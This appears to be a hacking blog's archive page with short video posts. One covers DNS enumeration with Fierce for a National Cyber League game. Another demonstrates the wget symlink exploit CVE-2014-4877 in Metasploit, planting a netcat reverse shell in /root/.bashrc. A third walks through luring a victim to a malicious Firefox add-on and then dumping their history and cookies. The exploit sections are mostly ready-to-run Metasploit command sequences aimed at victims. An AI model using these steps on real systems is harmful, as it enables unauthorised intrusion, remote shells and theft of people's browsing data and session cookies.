Archive | Demo RSS feed for this section
Video

DEATH WHISTLE

Video

The Pain of Electricity

Have you always wondered if you electrocuted yourself, which type of electricity would hurt more: AC (Alternating Current) or DC (Direct Current)? Wait no more!

Fierce DNS Enumeration for National Cyber League (NCL) Regular Season Game 2

The “nslookup” command has been altered so that it can no longer perform zone transfers. Instead check out Fierce, one of the best tools available for DNS Analysis.

fierce --dnsserver 54.243.174.22 -dns flag.ncl
Trying zone transfer first...

Unsuccessful in zone transfer (it was worth a shot)
Okay, trying the good old fashioned way... brute force

Checking for wildcard DNS...
Nope. Good.
Now performing 2280 test(s)...
127.44.65.92	admin.flag.ncl
127.1.0.1	secret.flag.ncl
127.79.255.255	termserv.flag.ncl
127.2.114.31	welcome.flag.ncl
127.212.83.111	zeus.flag.ncl

Subnets found (may want to probe here using nmap or unicornscan):
	127.1.0.0-255 : 1 hostnames found.
	127.2.114.0-255 : 1 hostnames found.
	127.212.83.0-255 : 1 hostnames found.
	127.44.65.0-255 : 1 hostnames found.
	127.79.255.0-255 : 1 hostnames found.

Done with Fierce scan: http://ha.ckers.org/fierce/
Found 5 entries.

Have a nice day.

As you can see from output above, the IP Address for the domain “flag.ncl” is missing. An alternative tool to use instead of “dig” would be:

dnsenum --dnsserver 54.243.174.22 --enum flag.ncl
Leave a Comment
Video

Wget Exploit Demonstration: CVE-2014-4877

msf > use auxiliary/server/wget_symlink_file_write
msf auxiliary(wget_symlink_file_write) > show options
msf auxiliary(wget_symlink_file_write) > set TARGET_FILE /root/.bashrc
msf auxiliary(wget_symlink_file_write) > set TARGET_DATA nc localhost 2222 -e /bin/bash &
msf auxiliary(wget_symlink_file_write) > exploit
nc -lvp 2222
wget -m ftp://192.168.2.104:2121/
Video

How to Get History and Cookies from Mozilla Firefox with Metasploit

Send the link of the server to the victim via chat, email or other social engineering technique. Once you have access to the victims PC; simply run post module to dump credentials.

msfconsole
use exploit/multi/browser/firefox_xpi_bootstrapped_addon
set payload firefox/shell_reverse_tcp
set lhost 192.168.72.128
set uripath /
exploit

How to Collect History

use post/firefox/gather/history
set payload firefox/shell_reverse_tcp
set lhost 192.168.72.128
set session 1
exploit
loot

How to Collect Cookies

use post/firefox/gather/cookies
set payload firefox/shell_reverse_tcp
set lhost 192.168.72.128
set session 1
exploit
loot